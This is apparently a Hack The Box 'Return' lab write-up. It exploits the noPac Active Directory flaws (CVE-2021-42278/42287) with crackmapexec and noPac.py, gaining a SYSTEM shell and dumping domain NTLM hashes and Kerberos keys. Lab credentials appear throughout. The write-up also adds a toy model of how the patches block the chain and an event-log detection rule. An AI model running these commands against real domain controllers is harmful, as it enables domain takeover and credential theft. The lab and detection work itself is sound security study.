CVE-2021-42278/CVE-2021-42287


The target might be vulnerable to the CVE-2021-42278 + CVE-2021-42287 chain (noPac): it runs an older build and does not appear to have the November 2021 fixes installed.

By default, Authenticated Users hold the SeMachineAccountPrivilege ("Add workstations to domain") user right on domain controllers, and the domain's ms-DS-MachineAccountQuota attribute lets each such user join up to 10 computer accounts. I have already confirmed that the svc-printer user holds the privilege. The quota can be checked both locally and remotely.

*Evil-WinRM* PS C:\tmp> Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota


DistinguishedName         : DC=return,DC=local
ms-ds-machineaccountquota : 10
Name                      : return
ObjectClass               : domainDNS
ObjectGUID                : d3137589-2523-4e02-8c2e-98b4fa01e413

Notice that ms-DS-MachineAccountQuota is set to 10, the default.

┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ ldapsearch -x -H ldap://return.local -D 'svc-printer@return.local' -w '1edFg43012!!' -b 'DC=RETURN,DC=LOCAL' -LLL | grep -w ms-DS-MachineAccountQuota
ms-DS-MachineAccountQuota: 10

The same attribute can also be checked remotely over LDAP with ldapsearch.

Exploit (noPac)


The CVE-2021-42278 + CVE-2021-42287 chain (noPac) impersonates the domain controller by abusing two missing checks. CVE-2021-42278: an unpatched DC does not enforce that a computer account's sAMAccountName ends with a trailing $, so a user who can create a machine account (quota above 0) renames it to the DC's name without the $ (here printer), requests a TGT for that name, and then renames the account back. CVE-2021-42287: when the KDC later handles an S4U2self request made with that TGT and cannot find an account named printer, it retries with a $ appended, resolves the DC's own account PRINTER$, and issues a service ticket to the DC on behalf of the user being impersonated (Administrator).
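To make the two lookups concrete, here is a toy model of the chain. This is an added example and not code from this write-up or from the noPac project: it models only the directory rename check and the KDC client-name resolution the chain abuses, plus the two fixes Microsoft shipped for them (sAMAccountName validation for computer objects, and the PAC_REQUESTOR SID check). There is no Kerberos crypto or ASN.1; a ticket is a dict. Names follow the page (PRINTER$, svc-printer, Administrator); the SIDs and the WIN-TOY$ account name are made up.

```python
"""Toy model of the noPac chain (added example; not from this write-up or the
noPac project). It models only the two directory/KDC decisions the chain abuses
and the fixes shipped for them: no Kerberos crypto or ASN.1, a ticket is a dict.
Names follow the page (PRINTER$, svc-printer, Administrator); SIDs and the
WIN-TOY$ account are made up."""
from dataclasses import dataclass


@dataclass
class Account:
    sam: str
    sid: str
    is_computer: bool


class Directory:
    """Stand-in for AD: sAMAccountName -> Account plus the two knobs that matter."""

    def __init__(self, accounts, maq=10, validate_sam=False):
        self.accounts = {a.sam.lower(): a for a in accounts}
        self.maq = maq                    # ms-DS-MachineAccountQuota
        self.validate_sam = validate_sam  # KB5008102 / CVE-2021-42278 fix

    def lookup(self, sam):
        return self.accounts.get(sam.lower())

    def add_computer(self, sam, sid):
        if self.maq <= 0:
            raise PermissionError("ms-DS-MachineAccountQuota exhausted")
        if self.lookup(sam):
            raise ValueError("sAMAccountName already exists")
        self.maq -= 1
        self.accounts[sam.lower()] = Account(sam, sid, True)

    def rename(self, old, new):
        acct = self.lookup(old)
        if acct is None:
            raise KeyError(old)
        if self.validate_sam and acct.is_computer and not new.endswith("$"):
            raise ValueError("computer sAMAccountName must end with '$'")
        if self.lookup(new):
            raise ValueError("sAMAccountName already exists")
        del self.accounts[old.lower()]
        acct.sam = new
        self.accounts[new.lower()] = acct


class KDC:
    def __init__(self, directory, pac_requestor=False):
        self.dir = directory
        self.pac_requestor = pac_requestor  # KB5008380 / CVE-2021-42287 fix

    def as_req(self, cname):
        acct = self.dir.lookup(cname)
        if acct is None:
            raise KeyError("KDC_ERR_C_PRINCIPAL_UNKNOWN")
        tgt = {"cname": acct.sam}
        if self.pac_requestor:
            tgt["pac_requestor"] = acct.sid  # SID of the account the TGT was issued to
        return tgt

    def resolve_client(self, tgt):
        acct = self.dir.lookup(tgt["cname"])
        if acct is None:
            # CVE-2021-42287: no account "printer", so retry as "printer$" -> the DC
            acct = self.dir.lookup(tgt["cname"] + "$")
        if acct is None:
            raise KeyError("KDC_ERR_C_PRINCIPAL_UNKNOWN")
        if self.pac_requestor and tgt.get("pac_requestor") != acct.sid:
            raise PermissionError("PAC_REQUESTOR SID does not match the resolved account")
        return acct

    def s4u2self(self, tgt, impersonate):
        acct = self.resolve_client(tgt)
        # service ticket to the TGT owner's own service, naming the impersonated user
        return {"service": acct.sam, "client": impersonate}


def build_domain(maq=10, validate_sam=False, pac_requestor=False):
    d = Directory([Account("PRINTER$", "S-1-5-21-1-1-1-1000", True),
                   Account("svc-printer", "S-1-5-21-1-1-1-1103", False),
                   Account("Administrator", "S-1-5-21-1-1-1-500", False)],
                  maq=maq, validate_sam=validate_sam)
    return d, KDC(d, pac_requestor=pac_requestor)


def run_nopac(directory, kdc, dc_sam="PRINTER$", new_sam="WIN-TOY$"):
    """Plays the noPac steps; returns the forged ticket or the error that blocked it."""
    spoof = dc_sam[:-1].lower()                                   # "printer"
    try:
        directory.add_computer(new_sam, "S-1-5-21-1-1-1-6101")  # 1. MAQ lets a plain user do this
        directory.rename(new_sam, spoof)                          # 2. CVE-2021-42278: drop the '$'
        tgt = kdc.as_req(spoof)                                   # 3. TGT with cname "printer"
        directory.rename(spoof, new_sam)                          # 4. put the name back
        return kdc.s4u2self(tgt, "Administrator")                 # 5. CVE-2021-42287 fallback
    except (ValueError, PermissionError) as err:
        return {"blocked": type(err).__name__, "reason": str(err)}
```

`run_nopac(*build_domain())` returns a service ticket for PRINTER$ as Administrator, which is exactly what the real tool saves as administrator_printer.return.local.ccache. Either fix alone is enough to break the chain: with `validate_sam=True` step 2 is refused, and with `pac_requestor=True` step 5 is refused because the SID carried in the TGT belongs to WIN-TOY$, not to the DC. Setting the quota to 0 stops it before step 1, which is why lowering ms-DS-MachineAccountQuota is the usual hardening advice even on patched domains.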

Testing


┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ cme smb $IP -d RETURN.LOCAL --kdcHost printer.return.local -u svc-printer -p '1edFg43012!!' -M nopac
SMB         10.10.11.108    445    PRINTER          [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:RETURN.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.11.108    445    PRINTER          [+] return.local\svc-printer:1edFg43012!! 
NOPAC       10.10.11.108    445    PRINTER          TGT with PAC size 1483
NOPAC       10.10.11.108    445    PRINTER          TGT without PAC size 718
NOPAC       10.10.11.108    445    PRINTER          
NOPAC       10.10.11.108    445    PRINTER          VULNEABLE
NOPAC       10.10.11.108    445    PRINTER          Next step: https://github.com/Ridter/noPac

crackmapexec ships a nopac module that tests for this. It requests two TGTs for the supplied user, one normally and one with PA-PAC-REQUEST set to false; an unpatched DC honours the request and returns a noticeably smaller ticket (1483 versus 718 bytes above), whereas a patched DC always includes the PAC so both sizes match. The result above confirms that the target is vulnerable.

Exploitation


┌──(kali㉿kali)-[~/…/htb/labs/return/noPac]
└─$ python3 noPac.py 'return.local/svc-printer:1edFg43012!!' --impersonate administrator -dc-ip $IP -use-ldap -dump -just-dc
 
███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target printer.return.local
[*] will try to impersonate administrator
[*] Adding Computer Account "WIN-BTT8JH9ZU7D$"
[*] MachineAccount "WIN-BTT8JH9ZU7D$" password = vUswK8d#GGW#
[*] Successfully added machine account WIN-BTT8JH9ZU7D$ with password vUswK8d#GGW#.
[*] WIN-BTT8JH9ZU7D$ object = CN=WIN-BTT8JH9ZU7D,CN=Computers,DC=return,DC=local
[*] WIN-BTT8JH9ZU7D$ sAMAccountName == printer
[*] Saving a DC's ticket in printer.ccache
[*] Reseting the machine account to WIN-BTT8JH9ZU7D$
[*] Restored WIN-BTT8JH9ZU7D$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating administrator
[*] 	Requesting S4U2self
[*] Saving a user's ticket in administrator.ccache
[*] Rename ccache to administrator_printer.return.local.ccache
[*] Attempting to del a computer with the name: WIN-BTT8JH9ZU7D$
[-] Delete computer WIN-BTT8JH9ZU7D$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1039d8288b0407460:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e48ce125611add31a32cd79e529964b:::
return.local\svc-printer:1103:aad3b435b51404eeaad3b435b51404ee:c1d26bdcecf44246b5f8653284331a2e:::
PRINTER$:1000:aad3b435b51404eeaad3b435b51404ee:efb65b83b414ea32e6ed711633871917:::
WIN-BTT8JH9ZU7D$:6101:aad3b435b51404eeaad3b435b51404ee:d5a1639e71af144a93e7921063ba4965:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:2f7d707eb859ec2c26109953831f54861a0ee47d3e4b16dde7f17009d08297b0
Administrator:aes128-cts-hmac-sha1-96:ef8673c4ba668752432c817dda62af48
Administrator:des-cbc-md5:4f0ee6291aabd338
krbtgt:aes256-cts-hmac-sha1-96:cc6ddaa28d2bb97926dabd1b82845479a97080aad93eddfd2ccf4f2ddf00961a
krbtgt:aes128-cts-hmac-sha1-96:cc5f4a49b6a0cdb71cdea34e84ba2a2e
krbtgt:des-cbc-md5:1086497c1fc1ab8a
return.local\svc-printer:aes256-cts-hmac-sha1-96:6dd6f85d0cf31eb1c01d7aff4e30a58bc5948e6f05e6d88f5cdb57be0208117d
return.local\svc-printer:aes128-cts-hmac-sha1-96:a92bc84131dcd4309431242e8ee9437e
return.local\svc-printer:des-cbc-md5:574cb9a8a8e5cb43
PRINTER$:aes256-cts-hmac-sha1-96:8ad926efb270eb570b27b3df1d5974e3510b063dfe4719c936596661dd8044f7
PRINTER$:aes128-cts-hmac-sha1-96:c4f7bc24dacca04acf119d1c2ab4cb87
PRINTER$:des-cbc-md5:2a3df408ea080716
WIN-BTT8JH9ZU7D$:aes256-cts-hmac-sha1-96:41597db8d62a1e39d29298137422439151e47414f145dc3000129a86f6e4b67e
WIN-BTT8JH9ZU7D$:aes128-cts-hmac-sha1-96:95bbe6e763622f64d61a6bc2d2931417
WIN-BTT8JH9ZU7D$:des-cbc-md5:ba6b13fe5b310d68
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
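The run above leaves a distinctive trail on the DC: a computer account is created by an ordinary user, its sAMAccountName is changed to a name without the trailing $, a TGT is requested for that name, and the name is changed back within seconds. The following detection is an added example and not part of the original write-up: the correlation rule is mine, and the event records are constructed JSON mirroring that sequence, with field names taken from the EventData of Security events 4741 (computer account created), 4781 (account renamed) and 4768 (TGT requested). The timestamps, the client IP and the DC inventory are assumptions.

```python
"""Correlating DC Security events left by a noPac-style rename (added example;
not part of the original write-up). The rule is mine; the events below are
constructed JSON records mirroring the sequence the noPac run above prints
(computer account added, renamed to "printer", TGT obtained, renamed back), with
field names taken from the EventData of 4741 (computer account created), 4781
(account renamed) and 4768 (TGT requested). Timestamps and the client IP are
made up, and the DC inventory is an assumption."""
import json
from datetime import datetime, timedelta

DOMAIN_CONTROLLERS = {"PRINTER$"}   # assumed inventory of DC computer accounts

SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"EventID": 4741, "TimeCreated": "2021-12-04T10:15:01",
     "SubjectUserName": "svc-printer", "TargetUserName": "WIN-BTT8JH9ZU7D$"},
    {"EventID": 4781, "TimeCreated": "2021-12-04T10:15:02", "SubjectUserName": "svc-printer",
     "OldTargetUserName": "WIN-BTT8JH9ZU7D$", "NewTargetUserName": "printer"},
    {"EventID": 4768, "TimeCreated": "2021-12-04T10:15:03",
     "TargetUserName": "printer", "IpAddress": "::ffff:10.10.14.5"},
    {"EventID": 4781, "TimeCreated": "2021-12-04T10:15:04", "SubjectUserName": "svc-printer",
     "OldTargetUserName": "printer", "NewTargetUserName": "WIN-BTT8JH9ZU7D$"},
    # benign noise: an admin renaming a workstation keeps the trailing '$'
    {"EventID": 4781, "TimeCreated": "2021-12-04T11:00:00", "SubjectUserName": "Administrator",
     "OldTargetUserName": "WS01$", "NewTargetUserName": "WS02$"},
]]


def parse_events(lines):
    events = [json.loads(line) for line in lines]
    for e in events:
        e["ts"] = datetime.fromisoformat(e["TimeCreated"])
    return sorted(events, key=lambda e: e["ts"])


def detect_nopac(lines, dcs=DOMAIN_CONTROLLERS, window=timedelta(minutes=10)):
    """Flag 4781 renames that strip the '$' from a computer account, then enrich."""
    events = parse_events(lines)
    findings = []
    for i, e in enumerate(events):
        if e["EventID"] != 4781:
            continue
        old, new = e["OldTargetUserName"], e["NewTargetUserName"]
        if not old.endswith("$") or new.endswith("$"):
            continue  # only computer -> non-computer renames matter here
        f = {"actor": e["SubjectUserName"], "account": old, "spoofed_name": new,
             "targets_dc": (new + "$").upper() in dcs, "created_by_actor": False,
             "tgt_from": [], "renamed_back": False}
        # look back: did the same principal create this account just before (MAQ abuse)?
        for p in events[:i]:
            if (p["EventID"] == 4741 and p["TargetUserName"].lower() == old.lower()
                    and e["ts"] - p["ts"] <= window):
                f["created_by_actor"] = p["SubjectUserName"] == e["SubjectUserName"]
        # look forward: a TGT for the spoofed name, then the original name restored
        for n in events[i + 1:]:
            if n["ts"] - e["ts"] > window:
                break
            if n["EventID"] == 4768 and n["TargetUserName"].lower() == new.lower():
                f["tgt_from"].append(n.get("IpAddress"))
            if (n["EventID"] == 4781 and n["OldTargetUserName"].lower() == new.lower()
                    and n["NewTargetUserName"].lower() == old.lower()):
                f["renamed_back"] = True
        if f["targets_dc"] and f["tgt_from"]:
            f["severity"] = "critical"
        elif f["targets_dc"] or f["tgt_from"]:
            f["severity"] = "high"
        else:
            f["severity"] = "medium"
        findings.append(f)
    return findings
```

`detect_nopac(SAMPLE_EVENTS)` yields a single critical finding for WIN-BTT8JH9ZU7D$: created by svc-printer, renamed to the DC's name, a TGT obtained for it from 10.10.14.5, and the name restored, which matches the tool's own log lines above. The rename of WS01$ to WS02$ is ignored because the new name keeps its $. In a real deployment the JSON records would come from the Security log of every DC (the 4781 and 4768 events land on the DC that served the request), and the DC inventory from the Domain Controllers OU rather than a hard-coded set.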

Domain Level Compromise

Pass-the-ticket with the saved ccache and the -k flag was not successful.

Shelldrop


┌──(kali㉿kali)-[~/…/htb/labs/return/noPac]
└─$ python3 noPac.py 'return.local/svc-printer:1edFg43012!!' -dc-ip $IP -use-ldap -shell
 
███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target printer.return.local
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-UPQBCAW6CI8$"
[*] MachineAccount "WIN-UPQBCAW6CI8$" password = je8Za^8s&1yz
[*] Successfully added machine account WIN-UPQBCAW6CI8$ with password je8Za^8s&1yz.
[*] WIN-UPQBCAW6CI8$ object = CN=WIN-UPQBCAW6CI8,CN=Computers,DC=return,DC=local
[*] WIN-UPQBCAW6CI8$ sAMAccountName == printer
[*] Saving a DC's ticket in printer.ccache
[*] Reseting the machine account to WIN-UPQBCAW6CI8$
[*] Restored WIN-UPQBCAW6CI8$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] 	Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_printer.return.local.ccache
[*] attempting to del a computer with the name: WIN-UPQBCAW6CI8$
[-] Delete computer WIN-UPQBCAW6CI8$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
c:\Windows\system32> whoami
nt authority\system
 
c:\Windows\system32> hostname
printer
 
c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::1a2
   IPv6 Address. . . . . . . . . . . : dead:beef::3ca0:8079:2c38:f2ac
   Link-local IPv6 Address . . . . . : fe80::3ca0:8079:2c38:f2ac%10
   IPv4 Address. . . . . . . . . . . : 10.10.11.108
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%10
                                       10.10.10.2

System Level Compromise